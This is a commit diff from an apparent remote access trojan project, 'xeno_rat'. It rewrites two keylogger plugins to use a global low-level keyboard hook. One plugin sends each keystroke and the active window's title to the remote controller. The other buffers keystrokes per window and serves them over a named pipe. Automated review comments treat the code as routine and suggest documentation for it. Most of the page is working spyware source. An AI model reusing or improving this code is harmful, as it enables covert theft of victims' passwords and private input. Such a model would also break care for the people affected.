added flags, domain name and idle time to the client view. improved k…
…eylogger, improved networking speeds by compression then encrypting, fixed some bugs. re-did the reverse proxy, works better now
moom825 committed Feb 9, 2024
1 parent 67b7a67 commit e823386
Showing 277 changed files with 2,218 additions and 410 deletions.
89 changes: 61 additions & 28 deletions Plugins/KeyLogger/keyLogger.cs
@@ -1,8 +1,10 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
using xeno_rat_client;
Expand All @@ -12,48 +14,76 @@ namespace Plugin
{
public class Main
{
public delegate IntPtr HookCallbackDelegate(int nCode, IntPtr wParam, IntPtr lParam);

[DllImport("user32.dll")]
public static extern IntPtr SetWindowsHookEx(int idHook, HookCallbackDelegate lpfn, IntPtr wParam, uint lParam);

[DllImport("user32.dll")]
public static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll")]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

private static int WH_KEYBOARD_LL = 13;
private static int WM_KEYDOWN = 0x100;

Node node;


public async Task Run(Node node)
{
await node.SendAsync(new byte[] { 3 });//indicate that it has connected

this.node = node;
IntPtr hookHandle=IntPtr.Zero;
new Thread(() =>
{
HookCallbackDelegate hcDelegate = HookCallback;
Process currproc = Process.GetCurrentProcess();
string mainModuleName = currproc.MainModule.ModuleName;
currproc.Dispose();
hookHandle = SetWindowsHookEx(WH_KEYBOARD_LL, hcDelegate, GetModuleHandle(mainModuleName), 0);
Application.Run();
}).Start();
while (node.Connected())
{
string retchar = await GetKey();
if (retchar != null)
{
string open_application = xeno_rat_client.Utils.GetCaptionOfActiveWindow().Replace("*", "");
await node.SendAsync(Encoding.UTF8.GetBytes(open_application));
await node.SendAsync(Encoding.UTF8.GetBytes(retchar));
}

Application.DoEvents();
await Task.Delay(1);
}
if (hookHandle != IntPtr.Zero)
{
UnhookWindowsHookEx(hookHandle);
}

}

private async Task<string> GetKey()
public async Task sendKeyData(string charectar)
{
return await Task.Run(() =>
string open_application = xeno_rat_client.Utils.GetCaptionOfActiveWindow().Replace("*", "");
if (node == null || !node.Connected()) return;
await node.SendAsync(Encoding.UTF8.GetBytes(open_application));
await node.SendAsync(Encoding.UTF8.GetBytes(charectar));
}

public IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
for (int i = 0; i < 255; i++)
int vkCode = Marshal.ReadInt32(lParam);
bool isShiftPressed = (GetAsyncKeyState((int)Keys.ShiftKey) & 0x8000) != 0;
string character = GetCharacterFromKey((uint)vkCode, isShiftPressed);
if ((((ushort)GetKeyState(0x14)) & 0xffff) != 0)//check for caps lock
{
short state = GetAsyncKeyState(i);
if ((state & 0x8000) != 0 && !keyStates[i])
{
keyStates[i] = true;
bool isShiftPressed = (GetAsyncKeyState((int)Keys.ShiftKey) & 0x8000) != 0;
string character = GetCharacterFromKey((uint)i, isShiftPressed);
return character;
}
else if ((state & 0x8000) == 0 && keyStates[i])
{
keyStates[i] = false;
}
character= character.ToUpper();
}
return null;
});
sendKeyData(character);
}
return CallNextHookEx(IntPtr.Zero, nCode, wParam, lParam);
}


private static Dictionary<uint, string> nonVisibleCharacters = new Dictionary<uint, string>()
{
{ 0x08, "[backspace]" },
Expand Down Expand Up @@ -185,10 +215,13 @@ private static string GetCharacterFromKey(uint virtualKeyCode, bool isShiftPress
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);

[DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
public static extern short GetKeyState(int keyCode);

[DllImport("user32.dll")]
private static extern int ToUnicode(uint virtualKeyCode, uint scanCode, byte[] keyboardState,
[Out, MarshalAs(UnmanagedType.LPWStr, SizeConst = 64)] StringBuilder receivingBuffer,
int bufferSize, uint flags);

}
}
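Review bot: The added `HookCallback` and `sendKeyData` in Plugins/KeyLogger/keyLogger.cs carry no comment saying what they collect, so a reader has to reconstruct it from the P/Invoke list. A header comment such as `// Global WH_KEYBOARD_LL hook: each WM_KEYDOWN is mapped to text and sent over node together with the foreground window caption` would state it plainly. As rendered, the section appears to replace a GetAsyncKeyState polling loop with `SetWindowsHookEx(WH_KEYBOARD_LL, …)` installed from a dedicated thread that runs `Application.Run`. For anyone triaging this binary, the observable behaviour is therefore a low-level keyboard hook owned by the process plus one pair of sends per keystroke, not key-state polling. Parts of the file are collapsed on this page, so `GetCharacterFromKey` and the rest of the class are not visible here.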
79 changes: 74 additions & 5 deletions Plugins/KeyLoggerOffline/KeyLoggerOffline.cs
@@ -1,5 +1,6 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Linq;
Expand All @@ -18,6 +19,7 @@ public class Main
bool started = false;
bool owner = true;
bool FULLSTOP = false;
IntPtr key_hook= IntPtr.Zero;
CancellationTokenSource FULLSTOP_token = new CancellationTokenSource();
Dictionary<string, string> applicationkeylogs;
string pipename = "OfflineKeyloggerPipe";
Expand Down Expand Up @@ -52,6 +54,7 @@ public class Main
try
{
byte[] data = await node.ReceiveAsync();
Console.WriteLine(data[0]);
if (data == null)
{
break;
Expand All @@ -67,7 +70,8 @@ public class Main
}
else if (data[0] == 1)
{
await Start();
Console.WriteLine("start");
Start();
}
else if (data[0] == 2)
{
Expand Down Expand Up @@ -97,7 +101,8 @@ public class Main
{
while (!FULLSTOP)
{
await Task.Delay(5000);
Application.DoEvents();
await Task.Delay(1);
}
}

Expand All @@ -112,7 +117,7 @@ public async Task StartServer()
{

applicationkeylogs = new Dictionary<string, string>();
keylogloop();
//keylogloop();
while (!FULLSTOP)
{
NamedPipeServerStream server = new NamedPipeServerStream(pipename, PipeDirection.InOut, 254, PipeTransmissionMode.Byte, PipeOptions.Asynchronous);
Expand Down Expand Up @@ -204,14 +209,42 @@ public async Task DO_FULLSTOP()
FULLSTOP = true;
FULLSTOP_token.Cancel();
FULLSTOP_token.Dispose();
if (key_hook != IntPtr.Zero)
{
UnhookWindowsHookEx(key_hook);
key_hook = IntPtr.Zero;
}
return;
}
try
{
await client.WriteAsync(new byte[] { 5 }, 0, 1);
}
catch { }
}

public IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (started && nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
bool isShiftPressed = (GetAsyncKeyState((int)Keys.ShiftKey) & 0x8000) != 0;
string character = GetCharacterFromKey((uint)vkCode, isShiftPressed);
string open_application = Utils.GetCaptionOfActiveWindow().Replace("*", "");
if ((((ushort)GetKeyState(0x14)) & 0xffff) != 0)//check for caps lock
{
character = character.ToUpper();
}
if (!applicationkeylogs.ContainsKey(open_application))
{
applicationkeylogs.Add(open_application, "");
}
Console.WriteLine(character);
applicationkeylogs[open_application] += character;
}
return CallNextHookEx(IntPtr.Zero, nCode, wParam, lParam);
}


public async Task keylogloop()
{
Expand All @@ -224,7 +257,7 @@ public async Task keylogloop()
string retchar = await GetKey();
if (retchar != null)
{
string open_application = xeno_rat_client.Utils.GetCaptionOfActiveWindow().Replace("*","");
string open_application = Utils.GetCaptionOfActiveWindow().Replace("*","");
if (!applicationkeylogs.ContainsKey(open_application))
{
applicationkeylogs.Add(open_application, "");
Expand Down Expand Up @@ -272,6 +305,7 @@ private static byte[] ConvertDictionaryToBytes(Dictionary<string, string> dictio
dictionary[currentKey] = currentValue.ToString(); // Use ToString to get the string
currentKey = null;
currentValue.Clear();

}
}
else
Expand Down Expand Up @@ -344,9 +378,18 @@ private static byte[] ConvertDictionaryToBytes(Dictionary<string, string> dictio
}
public async Task Start()
{
if (owner)
if (owner && !started)
{
started = true;
new Thread(() =>
{
HookCallbackDelegate hcDelegate = HookCallback;
Process currproc = Process.GetCurrentProcess();
string mainModuleName = currproc.MainModule.ModuleName;
currproc.Dispose();
key_hook = SetWindowsHookEx(WH_KEYBOARD_LL, hcDelegate, GetModuleHandle(mainModuleName), 0);
Application.Run();//this is blocking, fix it
}).Start();
return;
}
await client.WriteAsync(new byte[] { 2 }, 0, 1);
Expand All @@ -356,6 +399,13 @@ public async Task Stop()
if (owner)
{
started = false;

if (key_hook != IntPtr.Zero)
{
UnhookWindowsHookEx(key_hook);
key_hook= IntPtr.Zero;
}

return;
}
await client.WriteAsync(new byte[] { 3 }, 0, 1);
Expand Down Expand Up @@ -541,6 +591,25 @@ private static string GetCharacterFromKey(uint virtualKeyCode, bool isShiftPress
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);

[DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
public static extern short GetKeyState(int keyCode);

public delegate IntPtr HookCallbackDelegate(int nCode, IntPtr wParam, IntPtr lParam);

[DllImport("user32.dll")]
public static extern IntPtr SetWindowsHookEx(int idHook, HookCallbackDelegate lpfn, IntPtr wParam, uint lParam);

[DllImport("user32.dll")]
public static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll")]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

private static int WH_KEYBOARD_LL = 13;
private static int WM_KEYDOWN = 0x100;


[DllImport("user32.dll")]
private static extern int ToUnicode(uint virtualKeyCode, uint scanCode, byte[] keyboardState,
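Review bot: `HookCallback` in Plugins/KeyLoggerOffline/KeyLoggerOffline.cs keeps captured text in process memory, and nothing in the new code documents that. Each keystroke is appended to `applicationkeylogs[open_application]`, keyed by window caption, and is also written to standard output by `Console.WriteLine(character)`. A comment on the field along the lines of `// window caption -> captured keystrokes, held in memory while started is true` would make the data handling explicit. For host triage, the markers visible in this section are the pipe name `OfflineKeyloggerPipe`, the WH_KEYBOARD_LL hook installed in `Start`, and the keystroke echo on stdout. The hunks are separated by collapsed regions, so how the dictionary is read back is not shown here.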